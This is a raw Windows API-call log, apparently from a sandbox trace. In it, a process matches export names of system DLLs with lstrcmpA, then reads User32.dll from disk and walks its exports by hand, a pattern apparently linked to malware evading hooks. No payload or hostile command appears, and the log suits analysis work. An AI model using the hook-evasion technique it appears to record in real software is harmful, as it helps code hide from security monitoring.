[0108.290] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0108.290] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0108.290] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0108.291] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0108.291] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0108.291] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0108.291] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0108.292] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0108.292] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0108.293] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0108.293] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0108.293] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0108.293] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0108.294] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0108.294] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0108.295] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0108.296] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0108.297] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0108.297] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0108.297] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0108.297] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0108.298] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0108.504] GetProcessHeap () returned 0x430000 [0108.505] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x430000) returned 1 [0108.505] GetProcessHeap () returned 0x430000 [0108.505] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4491a0 [0108.505] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0108.505] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0108.505] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0108.505] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0108.505] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.506] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0108.506] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0108.506] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0108.506] GetProcessHeap () returned 0x430000 [0108.506] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1555b8) returned 0x411b040 [0108.510] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0108.510] ReadFile (in: hFile=0x17c, lpBuffer=0x411b040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411b040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0108.524] CloseHandle (hObject=0x17c) returned 1 [0108.524] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0108.524] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0108.524] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0108.524] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0108.524] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0108.524] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0108.524] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0108.524] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0108.524] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0108.524] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0108.524] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0108.525] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0108.525] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0108.525] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0108.525] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0108.525] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0108.525] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0108.525] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0108.525] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0108.526] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0108.526] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0108.526] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0108.527] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0108.527] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0108.528] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0108.528] 